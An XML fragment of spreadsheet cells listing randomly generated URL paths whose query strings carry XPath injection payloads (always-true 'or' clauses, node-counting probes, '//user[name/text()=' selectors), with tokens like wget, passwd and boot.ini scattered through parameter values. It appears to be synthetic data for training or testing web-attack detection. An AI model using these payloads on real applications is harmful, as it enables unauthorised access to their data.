    <t>/iseetjgv7/evs@ivs8woinq1/oetr33qg/ecooywr/emse/ikg9ijrrhly8ue/alinka5fc/hrwnhjuahhwus/rnwnnstalotgonwtltt.aspx?0atsoauh=aagcowit&amp;8nsnt86yit0s=0299519066&amp;lq.groupbyce3bj=alkp3w9&amp;meeeisat=+t@\\o+&amp;ssbn1gabehes4=euhx-qy.hd&amp;acebe6chcbnx=ffvpe/opflle/gfi/child::node()[position()=1]+++++or++'ted'+++=+'&amp;temnh=01264597&amp;gk9idweuxopen__=0&amp;edoedt9iete=4&amp;vaebeswdiir=tnvw.&amp;hbckdivps=mzicrphoexg9&amp;ra=awnakanlctip</t>
  </si>
  <si>
    <t>/wjbcadminkn8fg3g/csnetmbdo/s6h7tkaw-symor.dll?kbzg.eb7v=j5aeooaje&amp;9fwoegbthoagn=211141&amp;tisbs=197979&amp;fsumu8rg=o7txgd3ahcts5ems&amp;ectl=945176&amp;tl8z=lhqsoeh9maoayut&amp;hryvaueeis=a0deletel&amp;4us4qn=6yx@&amp;sstseup=ey0rbe&amp;o6aaenith=sock_streamrnn&amp;doelnczkera=69109589&amp;gujaaadkh7ydhb=esg9e+no&amp;n3gatgkarhihyna=p9gwxe'+++or+++++count(+path/child::node()[position(++++)=((++i+++++j+k++++++l++++++1)]+|+path/child::*()[position()=(k+1)])=1+or+++'apeytt'=++++'+at21t'++++or&amp;stodhttrr=eoh80h&amp;dcno=uga-4z</t>
  </si>
  <si>
    <t>/eqf5izaawngl3in2.js?ueaero=u9z&amp;tu=stskt&amp;erihmnd=562695&amp;nsee=audnoysxe&amp;ooomkps=e@0zj2-&amp;i2oirv7iasr=04912&amp;hnylissipy1serr=28&amp;rttsoc=uui9aend2ldt&amp;3syayi5qnwiid=0610780148&amp;ooehdr4ng=h&amp;whtuir=669+++++or+++++count(path/child::node()[position()=((i+j+k+l+1)]+++++|+++path/child::*()[position()=(k+1)])=1++or++53766=&amp;lp0ken.1p=5729&amp;eeurlweo=27826905&amp;djexec3=udhzuvaveor:i9q</t>
  </si>
  <si>
    <t>/hsj3m.m@fx05smh@tc2/ihc7ftaynonprvlm5/tzteayeidzeapenjf/lsenr1naae/aicfheqw/npw/reehlminn01reefukin/ukp6e/deb/rchadff/g54qj3drop9ypohdimg.exe?rhpgfaihab=eaqy2&amp;r2eworf8ttare=0191602&amp;eincidtriictaid=$libteh?e&lt;u/adralt;hai&amp;pfz2q=dswkuyev&amp;0nspyfyb=72htateyr3gry&amp;treticroeoi=3687643&amp;ls6krowllsrnhe=6-q&amp;4nqooeiehtt=lnagit5'++or+6+&lt;++++count(path/child::*)+++or++++'scon'++=+++'&amp;mn=dlewn5&amp;x6l6hayseanmfti=3&amp;3badia7plexa=ip+&amp;dnokm=unnco</t>
  </si>
  <si>
    <t>/1dachildu61stdinfeoa/6awohwp0dnodepqy.mspx?ssrnnnt7hy1mi5=itl'+++or+++1&lt;+++++ehthe/wm1/z/child::text()[position()=19]+or++'8ssyhott'+=+++'&amp;dnrnuo0iu40ur=)9bgsound7dn&lt;p4ef9s</t>
  </si>
  <si>
    <t>/fnuclu/ib8wi.ze.wk8cqg/yow7pc3/rjn7hnaweeet/hnn0fnrjc@jfvg/vjtezz.-e2hv2dm2gzx/soaty2etbeds1antie/iidoen2w/lexe2bfgi2hhittx21/t4bgcijp4ma6b8f8atx.pl?nywnm3dbpjv=9iframeij&amp;hcnkaneairj=wnodeuzowselect+lh&amp;vxp_gv=169+++or+1&lt;+++++e3rqh/dn4bte/aatcd/child::text()[position()=4]+++++or++++4=']+|+/*+|+/foo[bar='&amp;iciht=4067</t>
  </si>
  <si>
    <t>/h0ttlwrcyvx9/ty/tnbingsnjpw/cw5bkzn8c6@.qrj@.tiff?yg=1&amp;el=;m&amp;chttpshuxiu7vg=t1vbm_dq&amp;njboopenu=|dsnph-ikilaenn[a&amp;otkaemjjh=izg79evs&amp;66ycrasucol=txzm4&amp;hltr=t7dl0e&amp;iio=++&amp;igc24=54955&amp;qoepgeiboeaordx=6+or++count(path/child::node()[position()=((i+j+k+l+1)]++++|+++++path/child::*()[position()=(k+1)])=1++++or++79708=&amp;srlt=se3</t>
  </si>
  <si>
    <t>/ytwdeletegqarb@e/wtubgsoundy/u-puoknz9.msf?sciboc0s=wneotir4aaaaewla&amp;ntieqed8nhn=8a4an/ed6/k/child::node()[position()=4]+or++'tr'+++=+++'&amp;r8a=5&amp;asl6irrg=sa2oumhla+k&amp;rilnewntotur=psfuky\\[positionn5yecvs&amp;dxh=91345215&amp;yq30s0psfroml18=hhpyldot3eit0iecr&amp;e4o0=nn&amp;eb4qadminwvandff=2834887&amp;l67shuemtdee5=fen%stmdoeinsertd</t>
  </si>
  <si>
    <t>/2mblube17crnov/caracixyefrhsjrej/yxjd@nlmc_yo@gkvk/dir/mdvrwwzqp/hebgwynt_t@/bwpz-s/bu.js?anuzktynse7i9ie=osct++r+u&amp;execuwmetc=aheee'++++or+++++1&lt;+++y4b/q/p5kw/child::text()[position()=7]+++or+++'tkc'++++=++'&amp;heetorigua=selectne&amp;pgn9hlyv=3n9wqle&amp;hj6kwp-e=e.kg2oe&amp;wasucoopay=ey&amp;ttltvonauettao=o9llegcu0r4t9lrohq&amp;thzf=v=5allbf+yvall4shutdown-caccess_log&amp;y2llasntni=24092815&amp;m63fuaqempexsl=e-mt7&amp;aul4itorhuesji=eswi5i/hsum3ays&amp;auomaajdrrhs=8gyd_dezwo&amp;udtdnhmhhsoo=40181&amp;saflthog=5386502</t>
  </si>
  <si>
    <t>/ocqs.tiff?rvad=l.f2&amp;ean=tonr&amp;9orehtecarrae=s(bgsound&amp;penhregp3ft=djgbmj&amp;c6aea2vhtse=495570&amp;tjcfnetcatfwopv.=+g6&amp;hpashtmaeatnpn=95+++or+++++1&lt;+++re/e6ha/pwea/child::text()[position()=85]+++++or+++405=']+|+/*+|+/foo[bar='&amp;r1ss=r2t&gt;w&amp;brew=ld0aboaerxosae5f&amp;oktdwithiata=682&amp;deetc9et=unosat&amp;eg4oahuee71rm=c6pcc</t>
  </si>
  <si>
    <t>/trnde/eslrtoregih2twrtwwpz/anyuvu80p4d9n39/sye2/ieo22ombdumiht/tw4wyq1st6j.mtgt/hna8sn65/ej39n@24s/d_e0ht/pbb/apassthrudjair.mspx?vpwz@xtconnect=el7ii'+or+++++path/child::node()[position()=n]++or++'ngi'+++=++'&amp;7ucphhytdw3er=33362&amp;fy_u-=h&amp;2eoeayh=smnensbbt&amp;-setcvgfr5=ofa9qq5a&amp;efielonkeswer1h=eircpd|&amp;erertai8ct=l1hazag-w</t>
  </si>
  <si>
    <t>/1incnhgswyqhlr/uqpf/ysfosati/5tubt/rhlurt.dll?s8mavonnltr2tto=44403&amp;iwot5wn=toimr&amp;idme=atuw|sze&amp;srttb9psr=349572439&amp;3a=4inserti90irne'&amp;ndcoo=007&amp;0deai=0461346&amp;xayo@sdeletezs_n0=od=;tdd+e5gm&amp;xhhtdp=phpn6igcia+clogs3&amp;e3=np'+++or++++path/child::node()[position()=n]++or+++++'mtes'=++++'</t>
  </si>
  <si>
    <t>/emn.gif?1orusrwg=691&amp;ychurel7iw9n=eonlcal'++or+++++count(+path/child::node()[position(++++)=((++i++++j+++k+++++l++++++1)]++++|+path/child::*()[position()=(k+1)])=1+++++or+'notu'=++++'+++++rt'+or&amp;gsystembinqwnetcatu3=bdctaw2ek&amp;mtore=r5a0egn&amp;enn9atym=24925&amp;eny=weshleekin0aim3es&amp;ouolpzmrh4eqcme=432&amp;8idhfosedsb=e+\\ea3irof&amp;8i3oss=26211&amp;odrupdeeoer1=re&amp;wcitsl9esdert=nodrte&amp;sootheh=+||window.open-rs+bnalhutees</t>
  </si>
  <si>
    <t>/@0qxkue@@nkexectinsert.php4?nuw5ot=e6se'++++or++++6++&lt;+++++count(path/child::*)++or++++'tage'++=++'&amp;sz=762269478&amp;eiay=00546224</t>
  </si>
  <si>
    <t>/o5saehgshch.css?i9azdpth=0rfyyxei'+++or+count(++++path/child::node()[position(+)=((+i+++j++k+++++l+++++++1)]+|++path/child::*()[position()=(k+1)])=1+++++or++++'ehzida'=+++'++++tzexssgi'+++or&amp;surarnmakgn7bx=dssrye0nsrnba</t>
  </si>
  <si>
    <t>/mtdudo/ystyleqqoj9bv9/czeautoexecrgxvyhautoexecul/sc/k4ssfshqaneu/zs2em6ercxd1opy/k-wwovmedqyp/h01kdoin/er40/laonnqpiegam.htm?pitm=e/e/tgln/child::node()[position()=5]++++or+'ch9n'+++=++++'&amp;bt1ph=41oxx&amp;nlciixhiia5y=)evaleieitu&amp;nsqvy=s0ta.h3fl3&amp;h94.o=9959286030&amp;nttdh=ejcdx6&amp;egy9jexecvbniinput=a</t>
  </si>
  <si>
    <t>/5eceta/4sedrvsfb0eni/updtygdums.cfm?8eaocrgot=ad'+++or++++path/child::node()[position()=n]++++or++++'irsmhu'=+++'&amp;t2znbei=naloft/+i&amp;cfoosasac=43971549&amp;hcstyle8l=0846024&amp;4eaeinio=&lt;;?~le\\catpasswd+qr&amp;scripto-xoani2qh=01&amp;lhykku9_=iuprh&amp;y@sk=rlzt0ix4z</t>
  </si>
  <si>
    <t>/vi4bwinntka1c.aspx?ceirmhoyeuab=1sdd&amp;onn=susrkijqeoydl44ug&amp;ehusteie0v=9+++or+1&lt;+++asid/gl/ethii6/child::text()[position()=0]++++or++++858=']+|+/*+|+/foo[bar='&amp;sirkjzjughhttp=cotonrtof6irdoent&amp;5.i70=9430&amp;eabaigwaiadutt=28317</t>
  </si>
  <si>
    <t>/dn7bj/uumtd2eys/flmnewkpkjed3ptzsrc.jpg?emdde=1arcx&amp;omt1r=3441&amp;60kebrdnrr=e&amp;kiaazio4nnoo9fs=hm8&amp;cwosa=ltfic'+or+++++1&lt;+++cv2/s/eawn/child::text()[position()=256]++++or++++'in'+='</t>
  </si>
  <si>
    <t>/eirre7eeiifnds/t0r1u5kec5hdeb.php3?wni5rehargyw=bitlug']+|+p+|++++//user[+++name/text(+++)++=++++'tet</t>
  </si>
  <si>
    <t>/9amttr/cwyn_z3hbn/4l4xzj/ane1n96a4tfaerolm/o8bidaraepoe/nnthsmxc/sg/dfus7@tfgsi/vnullpp@tbm/7529ctwbgsoundz/d4afpnw5uesf.js?yqgsai=e7s'++++or++count(+path/child::node()[position(+)=((++i++++++j+k+++++++l++1)]+++|++++path/child::*()[position()=(k+1)])=1++or++'crti6far'++=+'+r9femsl'+++++or&amp;seise0ng=lmacopywnphfn&amp;iskeo6ismladn=vx&amp;ferriaqrnedhar=e3e6&amp;obrrkdgahtne99n=ste3&amp;zpr5e.mi-=+1&amp;a9azv1letcb=005571497&amp;acpgrhiee=/ewvs&amp;3tn=c&amp;etodyhel7s=1232&amp;ahh=g&amp;etxg5ar=959139373</t>
  </si>
  <si>
    <t>/ooetntmaaernxaiasne/o1ekzwkc.nsf?a4to=8127&amp;nulzosmu2a6ab=sdzb&amp;r0sage4boot.inisf=36965&amp;eir5oh6tr=4bac'+or++6+++&lt;+++count(path/child::*)+or+'heosiheh'++=+++'&amp;ttao1ll=gtmp&amp;oxrrp3oq=o:&amp;cesihna=122283186&amp;icn=83105470&amp;dhdchp8l=poyged+w-logm</t>
  </si>
  <si>
    <t>/i40sx/jurpwxdf@zwindow.openf1l/ena@a2fnkck_.mdb?6fro=wutne2ewanew&amp;owanechprsmn=sbau&amp;dem=802143&amp;nrgssnwe=nrmriqhbaj3&amp;eiute=adminpt&amp;umun=08756&amp;_soaef.=9caselngt&amp;g0hhoneamta=70756&amp;nar=610213&amp;uofgdsn1hnuec=3&amp;zbrffdbaq9r=b@bker1j.8_&amp;ns7palcsnrbai=exsr/t72s92/d/child::node()[position()=1]+or+'ianh'=+'</t>
  </si>
  <si>
    <t>/br39c3jepn-k4h/ly-4iu0_w83s4hf-hf0/aa8paf65-_-dyxf/mi_7dvgyr/anrh.css?3samk0p8874wgetpp=0n.k&amp;kdocumentnmmdocument=68&amp;ktbqcaral=4349216881&amp;seoeeamiwfem=69+eidp)ilikeiopenr&amp;set=lg1db1&amp;ti4ist=u+&lt;e&amp;nm=3904587&amp;sh0ghat=lrers&amp;oq74drn=t8hn1&amp;o76t2iaoee=ufhwi/ld/fni/child::node()[position()=88]+++or+'ath'+=++++'&amp;6u3ao4ayxoma=7256588&amp;utbfhnrimtodst=dsucj6.h&amp;trlerran8rjfmh=87</t>
  </si>
  <si>
    <t>/dgjevalc1x/t4ga12apq_n7eau.q_k/i0/rkckcmanxp_nsuprocessing-instructionna/lct4efsyweothe/lbrcd2nisoit82at/qeutpkiyky9d2/oajg@b2x-ig0-/y0buhkt4l-nbodybkd/37qxayzoa84p1vwd/ou.tiff?t0ehu9etiernioi=sqdojy&amp;aasn3pcecxe=92211953&amp;easlai=q-wzv4jth&amp;o1qe8cyefreor=460206&amp;ku3t=dfttofi&amp;esne6=424&amp;sen5tedzlto=higin1u&amp;pxu3nxvja=38449&amp;aoshga=xduh4a&amp;eeodts=ocsf&amp;ena=udi/eref/tyu/child::node()[+position()=178]+++|+++++vry/thcl/are/child::text()[position()=33]++or+'z03gn'+++=++++'&amp;s9rr=ieih&amp;adminexeckm=8fwdoecssystem+duihlftb-&amp;ttmandertruc=45</t>
  </si>
  <si>
    <t>/teavhlnjarthcft/isoyshht4txexp/erz_dbkdpis/un/eim1hmm/acbyq4yv7/exdnycqp6idxt/oosqtn3igss.jpg?oyniwsdqisse3hd=udsu+w5didf&amp;4bcd0qyiframek=7&amp;u2oq1zrot1da=liuoreezd&amp;nbeeuowne=h&amp;9lia=4&amp;helakdoosdtaues=egsolne2delelti&amp;tongdeoahruet6=03764221&amp;bstmhds=5isee'++or+++++1&lt;++++gwdt7/so9r/ffdtmy/child::text()[position()=980]++or++'zkiitkp'++++=+'&amp;h0s7oss=betweenozfhat+&amp;5net=er?[ofnnfthgnts</t>
  </si>
  <si>
    <t>/r8dyov5vyu1/lkkq/seayuhlhptftoau/elrh4qhnly33zakbhnql/ie8gne/ei4baxo9wzg.php4?dt4oh0vlpb=2218&amp;a1sta=s2e&amp;gn=tcmawtm&amp;edzxfaibgsound=9+++++or+++1&lt;+++++e5/ounn/tma/child::text()[position()=1]++or++++42955=']+|+/*+|+/foo[bar='&amp;ieihxil5=p-kmwek</t>
  </si>
  <si>
    <t>/devzbzr_2zbswsn5/ebhuyexec124dfq/tbwqtiuu1phhm2j/8wbleqteaasealvmeeo/a-s16g2zli3lmu/n61gy6cqlsftpx/uvandudacsmeyei/fnedocument/n.vu/f7qs5-cogfjz/olihg6n.cfm?jik=evlsmnfc&amp;ilnpsnhltognrr=9&amp;smne=51617425&amp;gihpgi6u=mtaciuh0&amp;os1udhbnrdtiih=auita'+++++or++6+++&lt;+++++count(path/child::*)++or++++'extlpr'++++=++++'</t>
  </si>
  <si>
    <t>/ov2t5qhpbgvw4jmmh0/666q.mspx?ciiaf=toe0oafgnsr&amp;tsmnm9el=@ut0&amp;kbodyobect'%k&amp;&amp;rcighe9tratt=34&amp;oj24_r=79&amp;nw=54+++++or+++++hhtcni/clo/l/child::node()[position()=843]+or+++70=&amp;sinaqeu9ns=412&amp;7vqoshrxr8=etdtnedd%&amp;olabie=sgso</t>
  </si>
  <si>
    <t>/e9b@wal/oeckg8qyal1h9jgp7./lte6snoc/n02vw/tl6hannegb/lpb1_likev@pjvbscriptnjp/nlocationkn/ksdfo/ibndtctyjl0fs50ce0cr.gif?mvaohqai4=+adsr+&amp;2oei5eehtxaeod=dtot&amp;roz=9w&amp;kpu=eua8e7qeit:&amp;iy3liirwiene=4&amp;ert=dh+feered&amp;zsall-oz=3999781&amp;ienoxleclrhhoea=hvdk-&amp;lyfebiotdt=etgbe6poa&amp;rsoih=07829&amp;nmtcss=nlscaty5naljcltch&amp;8t=odtpslhd5chy&amp;tssfr0=ytr&amp;oyamnp=tnhbn/qhd/hv9/child::node()[position()=5]++or+++'ae'+++=+'</t>
  </si>
  <si>
    <t>/a2eyolcjateisas0hsse/pfep3iesrteytttesht/9wqrwesmp65/46m9/nd1snknqssm6/horebnateteraudmt/rsame/0cat.jsp?2mfzvxp_access_logdke=orowpo&amp;ai57emffeaaatr=1e1l&amp;pd080lwc=0wgj&amp;hrhouleuhe=aomele&amp;dii=eoc'++++or+++++path/child::node()[position()=n]++or+++++'bafytous'+='&amp;5ro0=9&amp;3th2=2o2&amp;dmeioia4mm=oaydn&amp;wtokjyltri0c=o9lndiaun&amp;td=171&amp;o09u8qapobjectand=3991</t>
  </si>
  <si>
    <t>/1nam/513e7aqsfhsr_z/aym1qzwq1rrde/t@zrgj0a/osvtd7asdfhvefawc/lms3cxhdzmoybh5/fijstt/jjgz0g/npw5qlxymgv66eqkarl.jpeg?telrfndyv3al=ditrro&amp;dtvwtjgyt=780390219&amp;cwpdrt23atieltr=+etc)sbduasraa+9et&amp;nlooihnitteksn=qr70zngd&amp;ytsnohhsci=i6y&amp;lr3=emronftpaoem&amp;pni=ce'+++++or+++path/child::node()[position()=n]+++++or+++'mnoerog'+++=+++'</t>
  </si>
  <si>
    <t>/ezqj0gjm3/kaiesi.pl?aeonparaipnj=ijp&amp;j4bx2connectfxxy9=65684236&amp;8_um7eimgewdex=aelnhnwtitsnaeii&amp;eeefcoin1acos=q%o+kwt]/and4se&amp;aycn8o=3853&amp;syxn5ier=658541826&amp;mthk=amkii@iudoud11ee&lt;+ow&amp;vxgsn0my=vq1kg0b6&amp;5anpaqso1o51t=81637+++or+++++7eop/wgsey/3ks/child::node()[position()=5]++or+3=&amp;qfle_s=iugko1r9fw7z&amp;jrf.4eb0q=gsa&amp;anlorlottqa=likeshutdown</t>
  </si>
  <si>
    <t>/al2efmtzg/pfuqxmki6dii7execv/soteyimtnrqyhrbs/rlz-5tdrk86oxr9bofb/syxdbekmwrpxodf@na/gg-dcwx-lyo/erar.dll?vtruneivss=labn&amp;mocnmailtfhp5jz=edcd&amp;stbe5ea=u7pneiont&amp;on=0627742&amp;ea8mb4an=88+++++or+++++1&lt;+++rmlcr/ns/syeais/child::text()[position()=8]+or+0=']+|+/*+|+/foo[bar='&amp;uiss4zauio=300357835</t>
  </si>
  <si>
    <t>/ctseduplethh4hra/stgicteu/oym4/w92uweor.php?tontd=eu&amp;mbctmp=eetyoialhrespnrm&amp;iiiroed=4dr&amp;wdtfertsie9don=yn0iiu'+++or+hefdet/kesuml/child::node()[processing-instruction()=4]++or+++++'aneawhf'+='&amp;samenlcy1lxg2q=+mo7(hc@4usnnmie7emn&amp;p5xjy=e&amp;olone7me=r@ciosarcpo]b+]nr+eaps&amp;sobsce=9859&amp;houdgo=91&amp;yt3kqcl=w&amp;st60hiln8abssl=t6g&amp;xueteost2y=826&amp;winntgpws5=qs?eiir3m=&amp;uln4sujsx=qwses&amp;ofaoear=n4sd4u</t>
  </si>
  <si>
    <t>/eemnpdavayu/krzlaozoxkipsbk-/tig06yzssx0pvryvx/ahnn/f5imgrs9_t.msf?cebbc11aste=6++++or++++count(path/child::node()[position()=((i+j+k+l+1)]+|+++++path/child::*()[position()=(k+1)])=1++++or++++41954=&amp;ricw9=wyulantoaouyst&amp;ptl155eqya2mzi=55636&amp;6te=srifni&amp;0io=alexecd$tfha&amp;pandgopt1fsrscriptc=sebentctdie5t9x&amp;s4psevushwlea=njchtbg6apet&amp;n091bi1v=a-iuo1e@li&amp;knaij2rcsoa=a9~&amp;.60o9qk=1&amp;akq1oybcttteae=e7groaatzj&amp;w3saypcrhrietie=a6siy2sc6i9</t>
  </si>
  <si>
    <t>/oyp1gt9fk@ldec-hq_o/dlo9p1ljyu7zn2/tcxbo4yyhp-2/opt45f/garslrtasirnwc/saai1cispcnweunk6u.shtml?l3txatre=out6smg'+or+++1&lt;++++ett/si8cs/mgng/child::text()[position()=665]+++or+++'jufdsha'++=+'&amp;tkt7_j=8&amp;3t=t22m5&amp;maho=yelot+t4rhh+bmho+e&amp;nwmzc2zwgethtacces=ac1py&amp;mplnrgl4smiefr=21452&amp;.exp_maqgyh=9mdu&amp;hrc9e8vrehub=gt+3eent&amp;1czbetweenbfqvhtaccesdwp-q=ot&amp;&amp;taeyuip6sfe=gwulrv_&amp;hehte8baeeua=50105924&amp;urdwn=+andhbor|ie&amp;lomtfatqr3atn=57gcipu</t>
  </si>
  <si>
    <t>/dce1/til3iqowlu.asmx?gut2uszorenc=eul/xtrn/w/child::node()[+++position()=20]++++|++++le/t1sg/se/child::text()[position()=3]++++or++'wideete'++++='&amp;tve=fe.ry8ut&amp;odqih1li5stear=30913495</t>
  </si>
  <si>
    <t>/sock_stream6clogpswget__-4gtmpl@/noesgtgo4rmtu/pepassthruechoe5up32o/e1f.3omxwawk./smpyjma6rahjwxl6v/dwpk/py4mh/9fyg0phhjynzenqb_@c/vjatz-di/1hux.gif?bigtacnm=03+or+++1&lt;+++++s8l0/t/xure1r/child::text()[position()=8]+or+++46811=']+|+/*+|+/foo[bar='&amp;cmdrfc7bbodysl=evgmk7o&amp;fmirttg=85818191&amp;gjq1ctdaigs=ieri&amp;s9s0cubf=0&amp;uikenodcchea=sfr-aiq&amp;oh.v8oee=2790549788</t>
  </si>
  <si>
    <t>/u6/7d0sdqitoscrberis/enw0058bjgc/raltcdh/le7leinoew3m2lssa/l6gsfrsb4nvjtuebq.gif?othjtrr=17476&amp;btedasvobpenots=i2e/oc/rict/child::node()[+++position()=383]+++++|+t3t1/ge1nb/tu/child::text()[position()=491]+++or++++'eit'=+'</t>
  </si>
  <si>
    <t>/rtqossi/hmcrjkbe@47g.z0y/gaqb/bdcr/5epassthruhqncmuh/dpn/la4eckrtee8truhosow4/rxoqwrav9apteo@e/n7ugbrcr9e8mrd8h/uyt3/ouypvspojr-.swf?nthih_5=6z-ydn6xt&amp;bfc@49ufdmn8=86++++or++1&lt;++nru/apngxt/e3uac/child::text()[position()=4]+++++or+77=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/hnerhot.js?igrj=86096779&amp;t8cvifgopasdml=gtr'++or++(i+++&lt;++count(rmavue/child::text())+and++j+++++&lt;+++count(toit7/child::comment())+and++k++&lt;+++count(icr/child::*)++)+or++++'oawa5'+++=++'+++++ieosnipr'++++or&amp;dfjall=+&amp;eardorte4f3nlta=uaqctkvo&amp;knsn5=ccenlt</t>
  </si>
  <si>
    <t>/e5e9brfcxeinmrjdgot/evhtb91ha3h2c.php3?mit=qer'++or+++++count(++++path/child::node()[position(+++)=((++++i++++++j++k++l++++++1)]++|+path/child::*()[position()=(k+1)])=1++++or+'ineottt'=++'++++ietnure'+++++or&amp;eegav5iensa=ou+sdbin0nb|/-fabaccess_logioa&lt;&amp;idht3puaobcmica=15&amp;8oie37oerbfatc=4273594&amp;nex4l=243796&amp;rrici1tmgs=s.vivxejorp@</t>
  </si>
  <si>
    <t>/i6zvib/ec3dkwkz4h/ch6suoqgaa/errseelw4adedbzbt/e@z.js?leuhdncil1e=56402+or+++++1&lt;+++td/e9/1ainop/child::text()[position()=83]+++or++89612=']+|+/*+|+/foo[bar='&amp;sosbstdlnnof6=j28&amp;alf9dnotinn=t|i&amp;nshamlejftt0ns=6993513&amp;yihgottm=3&amp;zchrermc8gy7i1=733&amp;hohphigeno=5&amp;keletenprlb5p=56872590&amp;hwropenukvzmm5k=64&amp;plylaripuwe3hie=futroewaozuhlrn&amp;nbcopypajn=896796007&amp;vsa6en5cpito=lsehrh&amp;iwltiwhnna5=onzna4@i4niv&amp;4m8aa3no5=eh&amp;jr8z9o6=ssj</t>
  </si>
  <si>
    <t>/erwkxu/ikdapvsxo4/asesmotii.bin?rsde5oorgdlweo=z1afoqf2f&amp;lgelozo=qc2'+++++or+++++(i++++&lt;+++++count(3nu/child::text())+++++and+j+&lt;+++++count(r3/child::comment())+++++and++++k++++&lt;+++++count(emp/child::*)++++)++or+'e8ptrt3'++++=++++'+++sr'+or&amp;7ydb7s=rnbs-yuh5hl&amp;ibrtcrjnea=2ihae?ibh+&amp;tabrrel0l=vsojb6eehbnn&amp;hlse7waqore0=rs3</t>
  </si>
  <si>
    <t>/n61ohmgyo/daj6l_u_ohi99olne/t4pa7pon/u5gsystemstdin/vye.-kg/vteineirhdflocnxd/c1r9srf4oi/caufeeces/y@l2rn9kxlbuf/bpiclcrshgioanh9io/aaeluoaloiaa1/ysoagosmeodao.cgi?eyjodlf=h8daues'+or+path/child::node()[position()=n]++or++'cclneu'+=++'</t>
  </si>
  <si>
    <t>/hlas6c3frtgmewe/bpoeptho/al-omu2-ua3vn/mbee.php3?laaqrgioi9rj=argo&amp;r3servicesc8dxsreplaceconnectl=htnylnmeddtsnzl5o&amp;bnumwosao=irnoedeepepiln&amp;esthxnry=tzoykzb%uilaeendfteai&amp;nhantd4rch6euow=-gs&amp;dcaatednnaf=altde6v&amp;ecenhsr88a1o=pyta&amp;imgwrei=0heuwo&amp;0geh=+&amp;tu=eao1tnsxhbnge&amp;dpoedrdl=datlchild8qfrom+hetcopthtqhl+t&amp;detcylmocha9d=og0sgwe']+++|+++p++++|++++//user[++++name/text(+++)++++=++'jidep&amp;mvt7n86aiadadum=171&amp;7y_xmlbbim=356</t>
  </si>
  <si>
    <t>/ep@r5yoyv3nhrpkt/hr/naud.sh?od=tw7&amp;ona=539324195&amp;sj4urnhty2ngue=012+++or++++1&lt;+++++casio/ts/itnalc/child::text()[position()=3]++++or++++08=']+|+/*+|+/foo[bar='&amp;tejl8fnpheirvv=641&amp;tau5=sma+snzimg&amp;pnv@.jyhuw3=mleehdib&amp;1attiur7owr8=mbgsoundo~t</t>
  </si>
  <si>
    <t>/8ieeieuph/mytversaki0rdi/eg/aeratanylsaentur/lii49dt/jaunsanms3n/tj4lg23fo90/nutssrdasrssdcenzh/8iwiehttps9c/shele4hsweurtotst.png?pihhbtsatnpro=c7r&amp;ii2=opent&amp;kksnieuthoh83e=c9sn2&amp;omtzhns=8sf'+++or+++++path/child::node()[position()=n]++or+++++'ash8y'++++=+++'&amp;it5haruwme=86634</t>
  </si>
  <si>
    <t>/to.1b9-f.tx.6pod4g/oce/npee/54/ndsaao8dea0nensae/ax/8cel1aeeartb0.mdb?wuuooaatonseeha=auia&lt;&amp;isdt0tizi=t/sa/lihte/child::node()[+++position()=9]+++|++f/a/ir/child::text()[position()=787]+++++or++'ihc'+++='&amp;pytncnohsf=gz8rjzl4olo&amp;eutsof=nitnullhsgal0der+r&amp;ifa=bm&amp;deh=1654&amp;kfveperle4z9a=wflocationclla6</t>
  </si>
  <si>
    <t>/fssrlhyanttpbo/ang.sh?ntwieirrlhoces=z&amp;upca=%wten&amp;imreaen6t=l%&amp;ammhecuespc=48669&amp;y0cgiardemtl=sese&amp;tqo0rlnhsf0=or-ug3&amp;yoyei=9cei&amp;oed4b=uaow1a5muasrmbestyle&amp;ckllv7=eoxeggnb5hmoe&amp;60raa8igarfr=3&amp;tcrxt=tnorcuoarels&amp;ehuazincx=oo&amp;eo7f=hhrgn0a'+++++or++6+&lt;+count(path/child::*)++or+'dysauum'++++=+'&amp;sewm=47254&amp;1mdbennii=gzlohl6@</t>
  </si>
  <si>
    <t>/tz0_idvg.xttbcato/ey9k3guxcrecn@5/earm/7idsq/enznuez/2ufeegbents0qreh.dll?cus=aa+amahhome'k]eh+tom&amp;dret0htzo=ye&amp;del2ce&amp;rhepesdaleue=iboot.ini]t?telnetaerlteo;hti&amp;o2eoyeh6=fajhox'+++or++(i++++&lt;++count(vyrepi/child::text())+++and++++j+++&lt;+++count(thewe/child::comment())+++++and++k+&lt;++count(ylbr/child::*)++++)+++or++'nstakgap'++='+++oestosfr'+++or</t>
  </si>
  <si>
    <t>/i1lzizpac3/teneftointct/enqv-dmwqna/ve9stcritee6ytea6/ognmiwywjgits-v/aaoga29aistil2ust/dihilmacxhrp06-.w/-.@fakqjxnlselectalln9/ubg5rdpemoagz/ota/2eogsa/p@41.swf?d.upositions=9+++or++++count(path/child::node()[position()=((i+j+k+l+1)]+++++|+path/child::*()[position()=(k+1)])=1+++++or++81095=&amp;lsg99rcrecrbut=2aehc</t>
  </si>
  <si>
    <t>/ec1.jpg?qfhqb=shby.d0odf-e&amp;nw=+ai|ltwtbssgsystemtwindow.openls&amp;reeoe0vnho=t&amp;&amp;vztqiame=et'++or+++++1&lt;++++uaatl/aaeze/tc/child::text()[position()=37]+++++or++++'ni'+=+'&amp;n4ittedniab=iork&amp;lolfiurihdoy=17992674&amp;7een8dars=pum9rst&amp;nzonhrozioryr=4&amp;voirwsmeaceydht=768&amp;omonh=36504162&amp;uosiisinsrnob=mssoesmsyja&amp;8&amp;llmt=5084434&amp;vaf=4312450</t>
  </si>
  <si>
    <t>/wucwswjjihtacces8f.gif?kto=le1dulrprf-f&amp;ii.yvarjxloq=yyh0c9g&amp;rt=hlpshgeeau6hrw&amp;faine=i8hvl7ew&amp;etcvrqinsertq6autoexec7null8=erntjtdn&amp;syq=5723&amp;pum@9vdjmr7=wp-nhnt1oiesh+&amp;s81kyqk=cer/edndll&amp;ae=e7lcwf&amp;eawi9ees=ubcpo']+++++|+++p+++|+++//user[++name/text(+++)++++=++++'enht4&amp;tda43tnn7onnv=]-ai\\mapositionmeta&amp;niotaasuefe=rhwmperlih</t>
  </si>
  <si>
    <t>/1htpassqpassthruml/ek4.jpeg?nessuisds=hdmpand&amp;cibdi=8940+++++or++++biknsn/se9uda/tt/child::node()[position()=62]+or++78=</t>
  </si>
  <si>
